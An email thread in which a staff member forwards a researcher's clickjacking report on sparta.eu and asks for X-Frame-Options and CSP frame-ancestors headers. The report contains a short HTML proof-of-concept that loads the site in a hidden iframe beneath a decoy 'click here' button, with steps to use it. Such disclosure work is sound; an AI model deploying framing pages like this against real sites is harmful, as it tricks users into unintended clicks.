Hello Patrick,

 

This email is about security issue #5 reported yesterday on security@sparta.eu. It does not seem to be a critical security issue but this could be better to have X-Frame-Options headers activated at the web server level for sparta.eu domain and subdomains (with other security measures such as CSP frame-ancestors directoves for instance). Could you please have a look at this?

 

Best regards,

-- 

  Thibaud Antignac

  CEA List

 

 

From: security <security-bounces@server.sparta.eu> on behalf of Sakshi Patil <sakshipatil017@gmail.com>
Date: Sunday 22 November 2020 at 15:47
To: "security@sparta.eu" <security@sparta.eu>
Subject: [security] (Bug Report)Click jacking.

 

Vulnerability Name : Click jacking

Target URL:https://www.sparta.eu/

 

Vulnerability Description :
Click jacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.


The server didn't return an X-Frame-Options header which means that this website could be at risk of a click jacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid click jacking attacks, by ensuring that their content is not embedded into other sites.

Typically there is one type of attack - cross site request forgeries (CSRF) that can interact with functions on other websites.

1) This vulnerability affects Web Server.
<html>
   <head>
     <title>Clickjack test page</title>
   </head>
   <style>
    #myBtn{
       z-index: 999;
    position: absolute;
    top: 100px;
    right: 50px;
    color: white;
    background-color: red;
    }
    </style>
 <body>
   <!-- <h1> A Sample Test Page </h1>
     <p>Website is vulnerable to click jacking! </p>
    <p>Avoid random clicks </p> -->
<div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%; height:70%">
<iframe src="https://www.sparta.eu/

"frame1"  width="100%"

height="100%" >
</iframe></div>
<div align="right" style="position:absolute; top:1; left:0; z-index:1; width: 70%;height:60%; text-align:left;">

<a href="https://www.sparta.eu/

"target="_blank"><button id="myBtn"> click here</button></a>

<!-- <a href="https://www.sparta.eu/

"><button id="myBtn">Open Modal</button></a> -->

<div id="myModal" class="modal">
<!-- Modal content -->
 </div>
</body>
</html>

2.save it as <any name>.html eg s.html

3.and just simply open that..and click on button(direct login) its redirect https://www.sparta.eu/

   As far as i know this data is enough to prove that your site is vulnerable to Click jacking.


Impact:

Attacker may tricked user, sending them malicious link then user open it clicked some image and their account unconsciously has been deactivated .

 

Attachment: